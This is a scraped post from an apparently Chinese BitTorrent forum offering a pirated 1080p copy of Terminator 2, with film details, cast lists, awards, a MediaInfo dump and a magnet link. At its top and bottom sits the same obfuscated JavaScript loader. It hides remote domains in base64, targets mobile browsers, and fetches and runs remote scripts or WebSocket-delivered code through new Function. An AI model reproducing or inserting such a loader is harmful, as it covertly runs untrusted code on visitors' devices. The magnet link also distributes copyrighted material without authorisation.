终结者2:审判日[中文字幕].Terminator.2.Judgment.Day.1991.Extended.Cut.1080p.BluRay.x265.10bit.DTS 8.18GB

版主小s 26天前 181

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 终结者2:审判日 / 未来战士2(港) / 魔鬼终结者2(台) / 终结者2 / 终结者2:末日审判 / 终结者续集:世界末日 / T2

◎片 名 Terminator 2: Judgment Day

◎年 代 1991

◎产 地 美国 / 法国

◎类 别 动作 / 科幻

◎语 言 英语 / 西班牙语

◎上映日期 1991-07-03(美国) / 2017-02-17(柏林电影节 3D)

◎IMDb链接 https://www.imdb.com/title/tt0103064/

◎豆瓣评分 8.8/10 (298014人评价)

◎豆瓣链接 https://movie.douban.com/subject/1291844/

◎片 长 137分钟

◎导 演 詹姆斯·卡梅隆 James Cameron (id:1022571)

◎编 剧 詹姆斯·卡梅隆 James Cameron (id:1022571)

小威廉·威谢尔 William Wisher Jr. (id:1301118)

◎演 员 阿诺·施瓦辛格 Arnold Schwarzenegger (id:1035643)

琳达·汉密尔顿 Linda Hamilton (id:1027821)

爱德华·福隆 Edward Furlong (id:1022600)

罗伯特·帕特里克 Robert Patrick (id:1041135)

阿尔·伯恩 Earl Boen (id:1061235)

乔·莫顿 Joe Morton (id:1027892)

埃帕莎·默克森 S. Epatha Merkerson (id:1036616)

卡斯图罗·格雷拉 Castulo Guerra (id:1091477)

丹尼·库克塞 Danny Cooksey (id:1078994)

詹妮特·戈德斯坦恩 Jenette Goldstein (id:1004705)

山德·贝克利 Xander Berkeley (id:1036475)

莱思莉·汉密尔顿·格伦 Leslie Hamilton Gearren (id:1094333)

彼得·舒鲁姆 Peter Schrum (id:1140598)

唐·雷克 Don Lake (id:1036879)

吉姆·帕尔默 Jim Palmer (id:1293854)

格温达·迪肯 Gwenda Deacon (id:1344082)

科林·帕特里克·林奇 Colin Patrick Lynch (id:1010094)

妮基·考克斯 Nikki Cox (id:1017965)

德沃恩·尼克森 DeVaughn Nixon (id:1318110)

阿卜杜勒·萨拉姆·埃尔·拉扎克 Abdul Salaam El Razzac (id:1081059)

迈克·马斯喀特 Mike Muscat (id:1019273)

迪恩·诺里斯 Dean Norris (id:1315784)

查尔斯·A·坦伯罗 Charles A. Tamburro (id:1298880)

丹尼·皮尔斯 Denney Pierce (id:1294516)

马克·克里斯托弗·劳伦斯 Mark Christopher Lawrence (id:1113296)

林凡 Van Ling (id:1290113)

乔尔·克莱默 Joel Kramer (id:1055932)

斯科特·肖 Scott Shaw (id:1055454)

史文-欧尔·托尔森 Sven-Ole Thorsen (id:1027355)

小威廉·威谢尔 William Wisher Jr. (id:1301118)

Michael Edwards Michael Edwards (id:1085367)

Don Stanton Don Stanton (id:1150453)

Dan Stanton Dan Stanton (id:1150620)

Lisa Brinegar Lisa Brinegar (id:1072217)

Dalton Abbott Dalton Abbott (id:1055325)

Bret A. Arnold Bret A. Arnold (id:1057822)

Martin Deluca Martin Deluca (id:1023745)

迈克尔·比恩 Michael Biehn (id:1025190)

詹姆斯·卡梅隆 James Cameron (id:1022571)

布拉德·费德尔 Brad Fiedel (id:1032622)

亚当·格林伯格 Adam Greenberg (id:1276464)

康拉德·巴夫四世 Conrad Buff IV (id:1279581)

马克·戈德布拉特 Mark Goldblatt (id:1285044)

理查德·哈里斯 Richard A. Harris (id:1286113)

约瑟夫·C·内梅克三世 Joseph C. Nemec III (id:1293045)

约翰·M·德维尔 John M. Dwyer (id:1282892)

斯坦·温斯顿 Stan Winston (id:1002831)

史蒂夫·拉波特 Steve LaPorte (id:1289183)

Robert L. Stevenson Robert L. Stevenson (id:1298419)

杰夫·道恩 Jeff Dawn (id:1281940)

Peter Tothpal Peter Tothpal (id:1276622)

弗兰克·戴维斯 Frank Davis (id:1281909)

李·奥尔洛夫 Lee Orloff (id:1293624)

克莱格·巴朗 Craig Barron (id:1277981)

林凡 Van Ling (id:1290113)

马可·A·Z·迪普 Mark A.Z. Dippé (id:1328463)

杰克·莫多万 Jack Mongovan (id:1292344)

约翰·布鲁诺 John Bruno (id:1279507)

Jim Morris Jim Morris (id:1292540)

芭芭拉·布伦南 Barbara Brennan (id:1279246)

Geoff Campbell Geoff Campbell (id:1279960)

乔·威斯科西尔 Joe Viskocil (id:1300123)

史蒂夫·威廉姆斯 Steve 'Spaz' Williams (id:1301009)

小吉恩·沃伦 Gene Warren Jr. (id:1300455)

斯图尔特·罗伯特森 Stuart Robertson (id:1295796)

埃德·琼斯 Ed Jones (id:1287861)

Judith Weaver Judith Weaver (id:1300544)

Carl Miller Carl Miller (id:1292070)

吉姆·米切尔 Jim Mitchell (id:1292225)

Scott Beverly Scott Beverly (id:1278564)

道格拉斯·斯迈斯 Douglas Smythe (id:1297968)

罗伯特·斯科塔克 Robert Skotak (id:1297751)

Betzy Bromberg Betzy Bromberg (id:1384300)

Alison Savitch Alison Savitch (id:1296779)

Tony Alderson Tony Alderson (id:1276951)

戈登·贝克尔 Gordon Baker (id:1277729)

小约翰·安德鲁·伯顿 John Andrew Berton Jr. (id:1278529)

汤姆·柏提诺 Tom Bertino (id:1278530)

◎标 签 科幻 / 施瓦辛格 / 动作 / 经典 / 终结者 / 美国 / 美国电影 / 詹姆斯·卡梅隆

◎简 介

上一部中,超级电脑“天网”阻止人类抵抗领袖约翰·康纳诞生的行动失败,时隔13年后,在“审判日”到来之前,“天网”派出了更加先进的生化机器人T-1000(罗伯特·帕特里克 饰)从公元2029年回到洛杉矶追杀已经长大的约翰,与此同时,约翰也派出了机器人T-800(阿诺· 施瓦辛格 饰)回去保护年幼的自己。

此时,萨拉·康纳(琳达·汉密尔顿 饰)因为怪异的言行而住进了精神疗养院,约翰则和养父母住在一起,行为叛逆。T-800找到他们,在逃避T-1000追杀过程中,获得了二人的信任。

为了改变未来的历史,挽救人类的命运,萨拉、约翰和T-800 Model 101找到了“天网”之父,迈尔斯·戴森(乔·莫顿 饰),说服他销毁一切有关“天网”的资料,此时,警察和T-1000同时赶来,他们陷入了多方争斗中。

◎获奖情况 (共7项)

第64届奥斯卡金像奖 (1992)

最佳摄影(提名)

└──亚当·格林伯格 (id:1276464)

最佳剪辑(提名)

最佳视觉效果

最佳音效剪辑

最佳音响

最佳化妆

第15届日本电影学院奖 (1992)

最佳外语片(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 23970970155472806732678576576697824229 (0x1208A4137436576038F183667CA973E5)

  4. Complete name : Terminator.2.J[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.18 GiB

  8. Duration : 2 h 33 min

  9. Overall bit rate : 7 634 kb/s

  10. Movie name : Terminator 2

  11. Encoded date : UTC 2021-11-01 16:00:35

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 2 h 33 min

  23. Bit rate : 6 083 kb/s

  24. Width : 1 916 pixels

  25. Height : 816 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.162

  33. Stream size : 6.52 GiB (80%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=17.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. Format : DTS ES

  41. Format/Info : Digital Theater Systems

  42. Commercial name : DTS-ES Matrix

  43. Codec ID : A_DTS

  44. Duration : 2 h 33 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel(s)_Original : 7 channels

  49. ChannelLayout_Original : C L R Ls Rs Cs LFE

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 93.750 FPS (512 SPF)

  52. Bit depth : 24 bits

  53. Compression mode : Lossy

  54. Stream size : 1.62 GiB (20%)

  55. Language : English

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. Format : PGS

  61. Muxing mode : zlib

  62. Codec ID : S_HDMV/PGS

  63. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration : 2 h 28 min

  65. Bit rate : 24.4 kb/s

  66. Count of elements : 2258

  67. Stream size : 26.0 MiB (0%)

  68. Title : 简英

  69. Language : Multiple languages

  70. Default : No

  71. Forced : No


  72. Text #2

  73. ID : 4

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 2 h 28 min

  79. Bit rate : 12.1 kb/s

  80. Count of elements : 2258

  81. Stream size : 12.9 MiB (0%)

  82. Title : 简中

  83. Language : Chinese

  84. Default : No

  85. Forced : No


  86. Text #3

  87. ID : 5

  88. Format : PGS

  89. Muxing mode : zlib

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 2 h 28 min

  93. Bit rate : 24.6 kb/s

  94. Count of elements : 2258

  95. Stream size : 26.1 MiB (0%)

  96. Title : 繁英

  97. Language : Multiple languages

  98. Default : No

  99. Forced : No


  100. Text #4

  101. ID : 6

  102. Format : PGS

  103. Muxing mode : zlib

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 2 h 28 min

  107. Bit rate : 12.2 kb/s

  108. Count of elements : 2258

  109. Stream size : 13.0 MiB (0%)

  110. Title : 繁中

  111. Language : Chinese

  112. Default : No

  113. Forced : No


  114. Text #5

  115. ID : 7

  116. Format : PGS

  117. Muxing mode : zlib

  118. Codec ID : S_HDMV/PGS

  119. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration : 2 h 28 min

  121. Bit rate : 14.2 kb/s

  122. Count of elements : 2154

  123. Stream size : 15.0 MiB (0%)

  124. Title : 英

  125. Language : English

  126. Default : No

  127. Forced : No


  128. Menu

  129. 00:00:00.000 : Chapter 01

  130. 00:06:48.408 : Chapter 02

  131. 00:16:31.907 : Chapter 03

  132. 00:25:56.471 : Chapter 04

  133. 00:33:39.142 : Chapter 05

  134. 00:41:34.450 : Chapter 06

  135. 00:49:47.943 : Chapter 07

  136. 00:58:15.033 : Chapter 08

  137. 01:08:41.825 : Chapter 09

  138. 01:14:58.201 : Chapter 10

  139. 01:23:38.596 : Chapter 11

  140. 01:33:02.368 : Chapter 12

  141. 01:41:35.088 : Chapter 13

  142. 01:49:05.413 : Chapter 14

  143. 01:58:19.050 : Chapter 15

  144. 02:08:53.392 : Chapter 16

  145. 02:15:20.028 : Chapter 17

  146. 02:24:05.344 : Chapter 18


TAGS 动作 科幻

磁力链:
  • magnet:?xt=urn:btih:6AF0D72CC60DB6C4030DE00E9BF9C2AA8D81683F

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};